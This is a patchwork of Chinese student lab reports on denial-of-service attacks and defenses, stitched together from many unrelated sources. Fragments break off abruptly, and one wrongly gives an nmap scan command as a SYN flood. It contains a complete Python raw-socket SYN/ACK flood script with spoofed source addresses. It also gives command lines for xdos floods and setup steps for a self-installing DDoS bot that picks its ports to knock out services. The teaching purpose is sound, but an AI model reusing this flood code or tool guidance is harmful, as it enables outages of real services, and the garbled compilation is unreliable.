拒绝服务攻击实验报告
网络攻击实验报告
一、实验背景随着互联网技术的飞速发展,网络安全问题日益突出。
为了提高网络安全意识,掌握网络安全防护技能,我们进行了一次网络攻击实验。
本次实验旨在了解网络攻击的基本原理,熟悉常见的网络攻击手段,以及掌握相应的防御措施。
二、实验目的1. 理解网络攻击的基本原理和常见手段。
2. 掌握网络攻击实验的基本流程。
3. 熟悉网络安全防护技术,提高网络安全意识。
三、实验环境1. 操作系统:Windows 102. 网络设备:路由器、交换机、计算机3. 实验软件:Wireshark、Nmap、Metasploit等四、实验内容1. 漏洞扫描(1)使用Nmap扫描目标主机,发现潜在的安全漏洞。
(2)分析扫描结果,了解目标主机的开放端口和服务信息。
2. 拒绝服务攻击(DoS)(1)使用Metasploit生成大量的伪造请求,对目标主机进行DoS攻击。
(2)观察目标主机响应时间,分析攻击效果。
3. 口令破解(1)使用Hydra工具尝试破解目标主机的登录口令。
(2)观察破解过程,了解口令破解的原理。
4. 恶意代码传播(1)利用网络共享传播恶意代码,感染目标主机。
(2)分析恶意代码的传播过程,了解恶意代码的特点。
5. 数据窃取(1)使用网络监听工具,窃取目标主机传输的数据。
(2)分析窃取到的数据,了解数据窃取的原理。
五、实验结果与分析1. 漏洞扫描通过Nmap扫描,我们成功发现目标主机的开放端口和服务信息,发现了一些潜在的安全漏洞。
这为我们进行后续的攻击实验提供了依据。
2. 拒绝服务攻击(DoS)我们使用Metasploit生成了大量的伪造请求,对目标主机进行了DoS攻击。
观察目标主机的响应时间,发现攻击效果明显,目标主机无法正常响应服务。
3. 口令破解我们尝试破解目标主机的登录口令,使用Hydra工具进行暴力破解。
经过一段时间,成功破解了目标主机的口令。
4. 恶意代码传播我们利用网络共享传播恶意代码,成功感染了目标主机。
网络安全实验报告 - 拒绝服务攻击
一、实验目的
1.SYN洪水攻击
2.ICMP洪水攻击
二、实验内容与步骤
(1)SYN洪水攻击
对目标主机实施SYN洪水攻击的命令:nmap -v –sS -T5 靶机IP地址
(2)ICMP洪水攻击
启用实验平台ICMP洪水攻击工具
三、实验小结
SYN洪水攻击和ICMP洪水攻击尽管都能实现洪水攻击,但是二者的原理不同
1.SYN洪水攻击原理
在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发送SYN+ACK应答报文后是无法收到客户端的ACK报文的,即第三次握手无法完成,成为半连接状态。
这种情况下服务器端一般会新开一个等待线程来负责等待一段时间(SYN Timeout),而服务器里面用来存放等待线程的堆栈一般不会很大。
因此黑客可以大量模拟这种情况,使服务器忙于处理这种半连接状态,最终等待堆栈溢出
2.ICMP洪水攻击原理
a..直接Flood
源IP就是黑客自己的IP,回应ICMP发回到黑客自己
b.伪造IP的Flood
伪造源IP
c.Smurf
结合IP地址欺骗和ICMP回复的方法,使大量回应报文发向攻击目标主机,引起攻击目标系统瘫痪。
实验4:拒绝式服务攻击与防范
实验4:拒绝式服务攻击与防范【实验目的】熟悉SYNflood的攻击原理与过程,及IPv4所存在的固有缺陷。
【实验准备】准备xdos.exe拒绝服务工具。
【注意事项】实验后将DoS黑客软件从机器彻底删除,避免恶意应用影响网络运行。
【实验步骤】一、拒绝式服务攻击拒绝服务攻击的英文意思是Denial of Service,简称DoS。
这种攻击行动使网站服务器充斥大量要求回复的信息,消耗网络带宽或系统资源,导致网络或系统不胜负荷直至瘫痪而停止提供正常的网络服务。
SYN-Flood是当前最常见的一种Dos攻击方式,它利用了TCP协议的缺陷进行攻击用黑客软件xdos.exe对目标计算机进行拒绝服务攻击并运行测试。
(1)计算机a登录到windows 2000,打开sniffer pro,在sniffer pro中配置好捕捉从任意主机发送给本机的ip数据包,并启动捕捉进程。
(2)在计算机B上登录Windows 2000,打开命令提示窗口,运行xdos.exe,命令的格式:‖xdos<目标主机IP>端口号–t 线程数[-s <插入随机IP>’]‖(也可以用―xdos?‖命令查看使用方法)。
输入命令:xdos 192.168.19.42 80 –t 200 –s* 确定即可进行攻击,192.168.19.42 是计算机A的地址。
(3)在A端可以看到电脑的处理速度明显下降,甚至瘫痪死机,在Sniffer Pro的Traffic Map 中看到最大伪造IP的主机请求与A的电脑建立连接。
(4)B停止攻击后,A的电脑恢复快速响应。
打开捕捉的数据包,可以看到有大量伪造IP地址的主机请求与A的电脑连接的数据包,且都是只请求不应答。
以至于A的电脑保持有大量的半开连接。
运行速度下降直至瘫痪死机,拒绝为合法的请求服务。
二、拒绝式服务防范几乎所有的主机平台都有抵御DoS的设置,常见的有以下几种。
(1)关闭不必要的服务。
国家开放大学-—网络安全评价—实训2-拒绝服务攻击-TCP SYN Flood攻击与防御
信息安全与管理专业实训报告学生姓名:一、实训名称:拒绝服务攻击-TCP SYN Flood攻击与防御。
二、实训内容1、kali的安装部署2、SYN Flood攻击演示3、观察受攻击目标的系统状态4、防御措施三、实验步骤1、python攻击代码环境:ubuntu/kali +python 2.7.11使用方法如下:mode有三种模式syn攻击、ack攻击、混合攻击,虽说是支持多线程但是多个线程反而不如单线程快,估计是我的多线程弄得有些问题,麻烦这方面比较懂的朋友帮我指点一下。
我电脑是i7-6700单线程也只能这点速度。
cpu1已经使用89%了看一下抓包情况吧,因为只是测试用我也没带tcp的options字段,报文长度也不够64字节,不过也能传到目的地址。
下面是代码:#!/usr/bin/python#-*-coding:utf-8-*-import socketimport structimport randomimport threadingclass myThread (threading.Thread):def __init__(self,dstip,dstport,mode):threading.Thread.__init__(self)self.dstip = dstipself.dstport =dstportself.mode =modedef run(self):attack(self.dstip,self.dstport,self.mode)def checksum(data):s = 0n = len(data) % 2for i in range(0, len(data)-n, 2):s+= ord(data[i]) + (ord(data[i+1]) << 8) if n:s+= ord(data[i+1])while (s >> 16):s = (s & 0xFFFF) + (s >> 16)s = ~s & 0xffffreturn sdef IP(source,destination,udplen):version = 4ihl = 5tos = 0tl = 20+udplenip_id = random.randint(1,65535)flags = 0offset = 0ttl = 128protocol =6check =0source = socket.inet_aton(source)destination = socket.inet_aton(destination)ver_ihl = (version << 4)+ihlflags_offset = (flags << 13)+offsetip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,check,source,destination)check=checksum(ip_header)ip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,socket.htons(check),source,destination)return ip_headerdef TCP(srcip,dstip,protocol,dp,fg):source = socket.inet_aton(srcip)destination = socket.inet_aton(dstip)srcport=random.randint(1,65535)dstport=dpsyn_num=random.randint(1,4000000000)if fg == 2:ack_num=0else:ack_num=random.randint(1,4000000000) hlen=5zero=0flag=fgwindow=8192check=0point=0tcplen=hlenh_f=(hlen << 12)+flagTCP_head=struct.pack("!4s4sHHHHIIHHHH",source,destination,protocol,tcplen,srcport,dstport,s yn_num,ack_num,h_f,window,check,point)check=checksum(TCP_head)TCP_head=struct.pack("!HHIIHHHH",srcport,dstport,syn_num,ack_num,h_f,window,check,point )return TCP_headdef makepacket(dstip,dstport,fg):srcip=str(random.choice(ip_first))+'.'+str(random.randint(1,255))+'.'+str(random.randint(1,255))+'. '+str(random.randint(1,255))protocol=6ippacket=IP(srcip,dstip,5)+TCP(srcip,dstip,protocol,dstport,fg)return ippacketdef attack(dstip,dstport,mode):if mode == 'syn':fg=2while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'ack':fg=18while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'syn&ack':while 1:data=makepacket(dstip,dstport,2)s.sendto(data,(dstip,dstport))data=makepacket(dstip,dstport,18)s.sendto(data,(dstip,dstport))else:print 'DON\'T xia say!'dstip=raw_input('attack IP:')dstport=int(input('attack PORT:'))mode=raw_input('mode:(syn or ack or syn&ack)') threads=int(input("线程数threads:"))ip_first=[]for i in range(1,10):ip_first.append(i)for i in range(11,172):ip_first.append(i)for i in range(173,192):ip_first.append(i)for i in range(193,224):ip_first.append(i)s = socket.socket(socket.AF_INET,socket.SOCK_RAW,6) s.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)threads_name=[]for i in range(threads):threads_name.append('teread'+str(i))for i in range(threads):threads_name[i]=myThread(dstip,dstport,mode)for i in range(threads):threads_name[i].start()2、C语言攻击代码环境:ubuntu/kali gcc version 6.1.1 20160802 (Debian 6.1.1-11)使用方法:支持两个参数目的ip和目的端口性能:限制发包速度的是带宽(我这是100M的网,除去报文的前导码和帧间隔极限速度差不多就是9m左右了),cpu利用才27%,我在1000Mbps的网速下测试,单线程的话速度能到40m左右,cpu占用率大约85%左右。
网络攻击与防范-拒绝服务攻击实验
华北电力大学
实验报告|
|
实验名称拒绝服务攻击实验
课程名称网络攻击与防范
|
|
专业班级:网络学生姓名:
学号:成绩:
指导教师:曹锦纲实验日期:
3、此时打开百度页面,可以看到能抓到所有发给PC2的ip数据包。
4、在PC1上打开XDos.exe,命令的格式为:xdos <目标主机IP> 端口号 -t 线程数 [-s <插入随机IP>]。
输入命令:xdos 192.168.137.3 80 -t 200 -s*,回车即可攻击,192.168.137.3是PC2的IP地址。
5、在PC2中可以看到大量伪造IP地址的主机请求与PC2的电脑建立连接。
且能通过捕捉到的数据包看到都是只请求不应答,以至于PC2保持有大量的半开连接。
6、停止攻击后,PC2不再接收到数据包。
五、拒绝式服务防范
几乎所有的主机平台都有抵御DoS的设置,常见的有以下几种:
(1)关闭不必要的服务。
(2)限制同时打开的Syn半连接数目。
(3)缩短Syn半连接的time out时间。
(4)及时更新系统补丁.
六、实验心得与体会。
拒绝服务攻击与防范实验讲解
在被攻击的计算机10.0.27.10中可以查看收到的UDP 数据包,这需要事先对系统监视器进行配置,依次执
行“控制面板”→“管理工具”→“性能”,首先在 系统监视器中单击右侧图文框上面的“+”按钮,弹出 “添加计数器”对话框,如图所示。在这个对话框中
添加对UDP数据包的监视,在“性能对象”组合框中 选择“UDP v4”协议,选择“从列表选择计数器”单 选按钮,并在下面的列表框中选择“Datagrams Received/sec”即对收到的UDP数据包进行计算,配置 并保存在此计数器信息的日志文件。
作业
将三个任务完成的过程和结果用截图的形式放入 Word文件,下课前发送到老师的信箱。
DDoS攻击者1.5软件是一个DDoS攻击工具,程序运行后自动装入 系统,并在以后随系统启动,自动对事先设定好的目标进行攻击。
DDoS攻击者1.5软件分为生成器(DDoSMaker.exe)和DDoS攻 击者程序(DDoSer.exe)两部分。软件在下载安装后是没有DDoS 攻击者程序的,只有生成器DDoSMaker.exe,DDoS攻击者程序要 通过生成器进行生成。生成时可以自定义一些设置,如攻击目标 的域名或IP地址、端口等。DDoS攻击者默认的文件名为 DDoSer.exe,可以在生成时或生成后任意改名。DDoS攻击者程序 类似于木马软件的服务器端程序,程序运行后不会显示任何界面, 看上去好像没有反应,其实它已经将自己复制到系统中,并且会 在每次开机时自动运行,此时可以将复制过去的安装程序删除。 它运行时唯一会做的工作就是源源不断地对事先设定好的目标进 行攻击。DDoSer使用的攻击手段是SYN Flood方式。
信息安全技术实验四拒绝服务攻击实验
任务一UDP Flood攻击练习UDP Flood是一种采用UDP-Flood 攻击方式的DoS软件,它可以向特定的IP地址和端口发送UDP包。
在IP/hostname和port窗口中指定目标主机的IP地址和端口号,Max duration设定最长的攻击时间,在speed 窗口中可以设置UDP包发送的速度,在data框中,定义UDP数据包包含的内容,缺省情况下为UDP Flood.Server stress test的text文本内容。
单击Go按钮即可对目标主机发起UDP-Flood攻击。
如下图所示。
在被攻击主机中可以查看收到的UDP数据包,这需要事先对系统监视器进行配置。
打开“控制面板→管理工具→性能”,首先在系统监视器中单击右侧图文框上面的“+”按纽或单击鼠标右键,弹出“添加计数器”对话框。
在这个窗口中添加对UDP数据包的监视,在“性能对象”框中选择UDP协议,在“从列表选择计数器”中,选择“Datagram Received/Sec”即对收到的UDP数据包进行计数,然后配置好包村计数器信息的日志文件。
如下图所示。
当入侵者发起UDP Flood攻击时,就可以通过系统监视器查看系统检测到的UDP数据包信息了。
实验结果如下图所示在被攻击主机上打开Sniffer工具,可以捕获由攻击者计算机发到本地计算机的UDP数据包,可以看到内容为UDP Flood.Server stress test的大量UDP数据包,如下图所示任务二CC攻击练习CC主要是用来攻击页面的。
对于论坛,访问的人越多,论坛的页面越多,数据库就越大,被访问的频率也越高,占用的系统资源也就相当可观。
CC就是充分利用这个特点,模拟多个用户(多少线程就是多少用户)不停的进行访问(访问那些需要大量数据操作,就是需要大量CPU时间的页面)。
代理可以有效地隐藏身份,也可以绕开所有的防火墙,因为几乎所有的防火墙都会检测并发的TCP/IP连接数目,超过一定数目一定频率就会被认为是Connection-Flood。
拒绝服务攻击实验报告
网络攻防对抗实验报告实验名称:拒绝服务攻击(实验五)指导教师:专业班级:姓名:学号: ______电子邮件:___ 实验地点:实验日期:实验成绩:____________________一、实验目的1. 通过练习使用DoS/DDoS攻击工具对目标主机进行攻击;2.理解DoS/DDoS攻击的原理及其实施过程;3.掌握检测和防范DoS/DDoS攻击的措施。
二、实验原理1. 拒绝服务(DoS)攻击这是一种非常有效的攻击技术,它利用协议或系统的缺陷,采用欺骗的策略进行网络攻击,最终目的是使目标主机因为资源全部被占用而不能处理合法用户提出的请求,即对外表现为拒绝提供服务。
有几种常见的DoS攻击方法:(1)Synflood:该攻击以多个随机的源主机地址向目的主机发送SYN 包,而在收到目的主机的SYN ACK后并不回应,这样,目的主机就为这些源主机建立了大量的连接队列,而且由于没有收到ACK一直维护着这些队列,造成了资源的大量消耗而不能向正常请求提供服务。
(2)Land-based:攻击者将一个包的源地址和目的地址都设置为目标主机的地址,然后将该包通过IP欺骗的方式发送给被攻击主机,被攻击主机与自己建立空连接并保留连接,从而很大程度地降低了系统性能。
(3)洪水(UDP flood) :echo服务会显示接收到的每一个数据包,而chargen服务会在收到每一个数据包时随机反馈一些字符。
UDP flood 假冒攻击就是利用这两个简单的TCP/IP 服务的漏洞进行恶意攻击,通过伪造与某一主机的Chargen服务之间的一次的UDP 连接,回复地址指向开着Echo 服务的一台主机,通过将Chargen和Echo服务互指,来回传送毫无用处且占满带宽的垃圾数据,在两台主机之间生成足够多的无用数据流,这一拒绝服务攻击飞快地导致网络可用带宽耗尽。
(4)Smurf、UDP-Flood、Teardrop、PingSweep、Pingflood、Ping of Death2. DDoS的原理分布式拒绝服务(DDoS)是基于DoS攻击的一种特殊形式。
实验五拒绝服务攻击与防范实验报告
实验五报告课程名称计算机网络安全实验成绩实验名称拒绝服务攻击与防范实验学号姓名班级日期课程设计报告一、实验目的及要求:1.实验目的通过本实验对DoS/DDoS攻击的深入介绍和实验操作;了解DoS/DDoS攻击的原理和危害,并且具体掌握利用TCP、UDP、ICMP等协议的DoS/DDoS 攻击原理;了解针对DoS/DDoS攻击的防范措施和手段。
通过实验掌握DoS/DDoS攻击的原理;2.实验要求(1)使用拒绝服务攻击工具对另一台主机进行攻击。
(2)启动进行抓包工具,并分析TCP、UDP、ICMP等协议的DoS/DDoS攻击原理与危害。
(3)给出针对DoS/DDoS攻击的防范措施和手段。
二、实验过程及要点:实验过程:攻击机(192.168.13.33)目标机(192.168.13.22)原理:SYN攻击属于DOS攻击的一种,它利用TCP协议缺陷,通过发送大量的半连接请求,耗费CPU和内存资源。
此次模拟攻击为虚拟大量IP与目标建立不完整三次握手连接。
SYN Flood攻击的过程在TCP协议中被称为三次握手(Three-way Handshake),而SYN Flood拒绝服务攻击就是通过三次握手而实现的。
(1) 攻击者向被攻击服务器发送一个包含SYN标志的TCP报文,SYN(Synchronize)即同步报文。
同步报文会指明客户端使用的端口以及TCP连接的初始序号。
这时同被攻击服务器建立了第一次握手。
(2) 受害服务器在收到攻击者的SYN报文后,将返回一个SYN+ACK的报文,表示攻击者的请求被接受,同时TCP序号被加一,ACK(Acknowledgment)即确认,这样就同被攻击服务器建立了第二次握手。
(3) 攻击者也返回一个确认报文ACK给受害服务器,同样TCP序列号被加一,到此一个TCP连接完成,三次握手完成。
具体原理是:TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接。
dos攻击实验报告
dos攻击实验报告DOS 攻击实验报告一、实验背景在当今数字化的时代,网络安全成为了至关重要的问题。
分布式拒绝服务(DDoS)攻击作为一种常见的网络攻击手段,对网络服务的可用性和稳定性造成了严重威胁。
为了深入了解 DDoS 攻击的原理和危害,进行本次实验。
二、实验目的本次实验的主要目的是通过模拟 DDoS 攻击,观察其对目标系统的影响,分析攻击的特征和防御的难点,为网络安全防护提供实践经验和理论依据。
三、实验环境(一)攻击端1、操作系统:Windows 102、攻击工具:LOIC(Low Orbit Ion Cannon)(二)目标端1、操作系统:Ubuntu Server 20042、服务:Web 服务器(Apache)(三)网络环境1、局域网,通过路由器连接攻击端和目标端四、实验原理DDoS 攻击是指攻击者通过控制大量的傀儡主机(也称为“肉鸡”)向目标服务器发送大量的请求,导致目标服务器无法处理正常的请求,从而使服务瘫痪。
常见的 DDoS 攻击方式包括 SYN Flood、UDP Flood、ICMP Flood 等。
五、实验步骤(一)准备阶段1、在攻击端安装 LOIC 工具,并配置相关参数,如攻击目标的 IP地址和端口。
2、在目标端安装 Web 服务器,并确保其正常运行,同时安装网络监控工具,如 Wireshark,用于监测网络流量。
(二)攻击阶段1、启动 LOIC 工具,选择攻击模式(如 TCP、UDP 等),并点击“开始攻击”按钮。
2、观察目标端的 Web 服务器性能指标,如 CPU 利用率、内存利用率、网络带宽等,以及网络监控工具中的数据包情况。
(三)停止攻击点击 LOIC 工具中的“停止攻击”按钮,结束攻击。
六、实验结果与分析(一)目标端性能指标变化1、 CPU 利用率:在攻击期间,目标服务器的 CPU 利用率迅速飙升,达到 100%,导致服务器无法及时处理正常请求,响应时间延长。
拒绝服务攻击与防范实验
选择“可靠性和性能”单击
选择“性能监视器”单击
选择“+”号单击
弹出添加计数器如下图所示
选择Datagrams Received/sec后单击“添加”得下图所示,单击确定。
当入侵者发起UDP Flood攻击时,可以通过在被攻击计算 机中的系统监视器,查看系统监测到的UDP数据包信息,如 图所示,图中左半部分的凸起曲线,显示了UDP Flood攻击 从开始到结束的过程,接收UDP数据包的最大速率为250包/ 秒,由于图中显示比例为0.1,所以对应的坐标为25。 在被攻击的计算机上打开Ethereal工具,可以捕捉由攻击 者计算机发到本地计算机的UDP数据包,可以看到内容为 “UDP Flood.Server stress test”的大量UDP数据包。
拒绝服务攻击与防范实验
一、实验目的
通过练习使用DoS/DDoS攻击工具对目标主机进 行攻击,理解DoS/DDoS攻击的原理及其实施过程, 掌握监测和防范Dos/DDoS攻击的措施
二、实验原理
拒绝服务(Denial of Service,DoS)攻击通常是针 对TCP/IP中的某个弱点,或者系统存在的某些漏洞,对 目标系统发起大规模的进攻,使服务器充斥大量要求 回复的信息,消耗网络带宽或系统资源,导致目标网 络或系统不胜负荷直至瘫痪、无法提供正常服务。 分布式拒绝服务(Distribute Denial of Service, DDoS)攻击是对传统DoS攻击的发展,攻击者首先侵 入并控制一些计算机,然后控制这些计算机同时向一 个特定的目标发起拒绝服务攻击。
在被攻击的计算机上打开Ethereal工具,可以捕捉 由攻击者的计算机发到本地计算机的异常TCP数据包, 可以看到这些TCP数据包的源计算机和目标计算机IP地 址都是10.0.83.117,这正是Land攻击的明显特征。
实验18 拒绝服务攻击事件的处理
拒绝服务攻击事件的处理(SEC-W07-003.1)拒绝服务攻击即攻击者想办法让目标机器停止提供服务或资源访问,是黑客常用的攻击手段之一。
这些资源包括磁盘空间、内存、进程甚至网络带宽,从而阻止正常用户的访问。
其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分,只要能够对目标造成麻烦,使某些服务被暂停甚至主机死机,都属于拒绝服务攻击。
拒绝服务攻击问题也一直得不到合理的解决,究其原因是因为这是由于网络协议本身的安全缺陷造成的,从而拒绝服务攻击也成为了攻击者的终极手法。
实验目的●通过学习使用简单的发包工具模拟发包,检查目标主机的网络情况,了解拒绝服务攻击的一般特征以及相关处理措施。
(本次实验只是拒绝服务攻击的简单模拟,网络实际发生的攻击行为要复杂的多)实验准备●了解拒绝服务攻击,并针对此类攻击事件作出相应处理实验步骤使用udpflood.exe程序发送udp包攻击实验服务器1.获取到本课件的工具压缩把以后,将包解压并运行其中的udpflood.exe文件,如:图1图12.在上图所示的界面中:a) IP/hostname处输入实验服务器的IP地址b) Port出输入445c) Max duration(secs)输入900d) 在speed的位置选择max (LAN)e) 然后点击go开始发包。
如:图2图23.运行远程桌面客户端程序mstsc.exe,输入服务器IP地址,点击Connect连接,如:图3图34.以Administrator(管理员)(口令:1qaz@WSX)身份登陆实验服务器桌面。
5.点击远程桌面右下角的天网防火墙的图标,打开天网防火墙的界面,然后选择日志的标签,如:图4图46.在天网防火墙的日志中可以查看到大量的来自同一个IP(请记下该IP,做后面的规则添加用)的udp包,本机端口是445,并且该包是允许通行的。
如:图5图57.在本机点击udpflood程序界面上的stop,停止发包,但是不要关闭该程序,如:图6图6设置防火墙规则禁止udp包通过1.点击天网防火墙的IP规则管理标签,打开IP规则管理界面,然后点击增加规则图标,如:图7图72.在增加IP规则界面中:a) 名称处输入一个名称,如:deny udpb) 数据包方向:选接受即可c) 对方IP地址处:选择指定地址,然后在ip处填入刚才在日志中看到的ip地址。
拒绝服务攻击与防御实验-DDOS攻击技术实验
4. 检查Server状态。
发动攻击前,为了保证Server的有效,我们最好对它来次握手应答过程,把没用的Server踢出去,点击“检查状态”按钮,Client
列表来次扫描检查,最后会生成一个报告,看:
5. 清理无效主机
点“切换”按钮进入无效主机列表,用“清理主机”按钮把无效的废机踢出去,再按一次“切换”转回主机列表。
7. 攻击
经过前面的检测,我们现在可以发动攻击了。
SYN攻击:源IP乱填(要遵守IP协议),目标IP填你要攻击的IP或域名,源端口0---65535随便一个,目标端口:80--攻击HTTP,21--攻击FTP,23--攻击Telnet,25/110--攻击E-MAIL,8000--攻击腾讯
8. 对方机器的cpu占用率如图所示:
证明攻击成功,但攻击完事之后,一定要记得停止攻击。
实验完毕,关闭虚拟机和所有窗口。
拒绝服务器攻击事件处理实验报告
拒绝服务器攻击事件处理实验报告《拒绝服务器攻击事件处理》实验报告学院:信息工程学院姓名:褚芳芳班级:计应1101班学号:0401110336拒绝服务攻击及攻击者想办法让目标机器停止服务或资源访问,是黑客常用的攻击手段之一。
这些资源包括磁盘空间、内存条、进程甚至网络宽带,从而阻止正常用户的访问。
其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一部分,只要能对目标造成麻烦,使某些服务器被暂停甚至主机死机,都属于拒绝服务攻击。
拒绝服务攻击问题也一直得不到合理的解决,究其原因是因为这是由于网络协议本身的安全缺陷造成的,从而拒绝服务攻击也成为了攻击者的终极手法。
实验目的:通过学习使用简单的发包工具模拟发包,检查目标主机的网络情况,了解拒绝服务攻击的一般特征及相关处理措施。
【使用udpflood.exe程序发送udp包攻击实验服务器】1、获取工具压缩后,将包解压并运行其中的udpflood.exe文件:2、在上图所示的界面中输入下列数据:→IP/hostname处输入实验服务器的IP地址→Port出输入445→M ax duration(secs)输入900→在speed的位置选择max (LAN)→然后点击go开始发包。
3、打开天网防火墙界面,点击日志标签:4、在天网防火墙的日志中可以查看到大量的来自同一个IP(请记下该IP,做后面的规则添加用)的udp包,本机端口是445,并且该包是允许通行的:6、在本机点击udpflood程序界面上的stop,停止发包,但是不要关闭该程序【设置防火墙规则禁止udp包通过】1、点击天网防火墙的IP规则管理标签,打开IP规则管理界面,然后点击增加规则图标:2、在增加IP规则界面中输入下列数据:→名称处输入一个名称,如:deny udp→数据包方向:选接受即可→对方IP地址处:选择指定地址,然后在ip处填入刚才在日志中看到的ip地址。
→数据包协议类型:选择udp→在当满足上述条件处:选择拦截,并在记录和告警处打勾。
拒绝服务攻击1
(5)通过对协议分析器所捕获到的数据包进行分析,说明在攻击者对靶机开放的TCP端口进行洪泛攻击时,靶机为什么会消耗大量的系统资源:
答:传送控制协议(TCP)同步(SYN)攻击。TCP进程通常包括发送者和接受者之间在数据包发送之前创建的完全信号交换。启动系统发送一个SYN请求,接收系统返回一个带有自己SYN请求的ACK(确认)作为交换。发送系统接着传回自己的ACK来授权两个系统间的通讯。若接收系统发送了SYN数据包,但没接收到ACK,接受者经过一段时间后会再次发送新的SYN数据包。接受系统中的处理器和内存资源将存储该TCP SYN的请求直至超时。DDoS TCP SYN攻击也被称为“资源耗尽攻击”,它利用TCP功能将僵尸程序伪装的TCP SYN请求发送给受害服务器,从而饱和服务处理器资源并阻止其有效地处理合法请求。它专门利用发送系统和接收系统间的三向信号交换来发送大量欺骗性的原IP地址TCP SYN数据包给受害系统。最终,大量TCP SYN攻击请求反复发送,导致受害系统内存和处理器资源耗尽,致使其无法处理任何合法用户的请求。。
二.ICMP洪水攻击
(1)攻击者启动协议分析器,监听任意源与靶机间的ICMP会话数据,协议分析器设置方法参看步骤一。
(2)靶机启动“性能监视器”,监视在遭受到洪水攻击时本机CPU、内存消耗情况。具体操作参看步骤一。需要说明的是监视的性能对象应为ICMP,并且计数单位应为“Messages Received/sec”。
3实验过程详细描述(可包含自绘图形和截图)
一.SYN洪水攻击
1.捕获洪水数据
(1)攻击者单击实验平台工具栏中的“协议分析器”按钮,启动协议分析器。单击工具栏“定义过滤器”按钮,在弹出的“定义过滤器”窗口中设置如下过滤条件:
拒绝服务攻击的实现
拒绝服务攻击的实现一、实验目的通过联系使用DoS/DDoS攻击工具对目标主机进行攻击;理解DoS/DDoS攻击的原理和实施过程;掌握检测和防范DoS/DDoS攻击的措施。
二、实验内容1、UDP Flood 攻击练习UDP Flood 是一种采用UDP Flood 攻击方式的DoS 软件,它可以向特定的IP地址和端口发送UDP包。
在ip/hostname和Port窗口中制定目标主机的IP地址和端口号;在Max duration 设定最长攻击时间,在Speed窗口中设置UDP包发送的速度,在data中定义数据包中的内容;单击Go就可以对目标主机发起攻击。
如下图所示:2、在192.168.1.1计算机中可以查看收到的UDP数据包,这需要事先对系统监视器进行配置。
打开“性能”对话框,如下图所示,我们在这个窗口中添加对UDP数据包的监视,在性能对象中选择UDP协议,在从列表选择计数器中选择Datagram Received/Sec 即对收到的UDP计数。
2、DDoSer的使用DDoSer是一种DDos的攻击工具,程序运行后自动转如系统,并在以后随系统启动,自动对事先设定好的目标进行攻击。
本软件分为生成器和攻击者程序。
软件下载后是没有DDoS攻击者程序的,需要通过生成器DDoSmaker.exe进行生成。
DDoSer使用的攻击手段是SYN Flood 方式。
如下图所示:设置并生成DDoS攻击者程序:首先运行生成器(DDoSMaker.exe),会弹出一个对话框,在生成前要先进行必要的设置,其中:“目标主机的域名或IP地址”:就是你要攻击主机的域名或IP地址,这里我们建议使用域名,因为IP地址是经常变换的,而域名是不会变的。
“端口”:就是你要攻击的端口,请注意,这里指的是TCP端口,因为本软件只能攻击基于TCP的服务。
80就是攻击HTTP服务,21就是攻击FTP服务,25就是攻击SMTP服务,110就是攻击POP3服务等等。
拒绝服务攻击攻击实验报告
六、实验器材(设备、元器件):
(1)个人计算机
(2)Windows 2000系统平台
(3)C或C++程序开发环境
也可以是其他操作系统如Linux,Unix,开发语言也可以自由选择,推荐使用C++或C
七、实验步骤及操作:
(1)定义相关数据结构如tcp头,ip头,定义TCP伪首部(用于计算校验和),定义计算校验和的函数
实验报告
学生姓名:
学号:
一、实验室名称:软件实验室
二、实验项目名称:网站攻击实验(拒绝服务攻击WEB服务器)
三、实验原理:
拒绝服务攻击使系统瘫痪,或明显的降低系统的性能,因为过量使用资源而致使其他合法用户无法访问。大部分操作系统、路由器和网络组件都容易受DoS攻击。SYN Flood是当前最流行的DoS(拒绝服务攻击)与DDoS(分布式拒绝服务攻击)的方式之一,这是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。
(6)编写线程涵数,线程涵数完成TCP,IP头的校验和计算,使用memcpy涵数填充发送缓冲区,使用sendto涵数发送TCP报文
(7)编译调试程序
(8)进行攻击
八、实验数据及结果分析:
在受攻击的实验主机上安装了一个Web服务器Apache
攻击前,用IE浏览器访问该Web服务器,可以正常访问
进行攻击时,再访问该Web服务器及心得体会:
十一、对本实验过程及方法、手段的改进建议:
报告评分:指导教师签字:
介绍这种攻击的基本原理要从TCP连接建立的过程开始。建立TCP连接的标准过程是这样的:首先,请求端(客户端)发送一个包含SYN标志的TCP分组,此同步报文会指明客户端使用的端口以及TCP连接的初始序号;第二步,服务器在收到客户端的SYN分组后,将返回一个SYN/ACK分组,表示客户端的请求被接受。第三步,客户端也返回一个确认分组ACK给服务器端,到此一个TCP连接完成。以上的连接过程在TCP协议中被称为三次握手(Three-way Handshake)。问题就出在TCP连接的三次握手中,假设一个用户向服务器发送了SYN分组后突然死机或掉线,那么服务器在发出SYN/ACK应答后是无法收到客户端的ACK分组的(第三次握手无法完成),这种情况被称为半开TCP连接状态。此时服务器端一般会重试(再次发送SYN/ACK给客户端)并等待一段时间后丢弃这个半开TCP连接,这段时间的长度我们称SYNTimeout,一般来说这个时间是分钟的数量级(大约为30秒-2分钟);一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半开连接列表而消耗非常多的资源——数以万计的半连接,即使是简单的保存并遍历也会消耗非常多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN/ACK的重试。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃。即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小),此时从正常客户的角度看来,服务器失去响应,这种情况我们称作:服务器端受到了SYN Flood攻击。
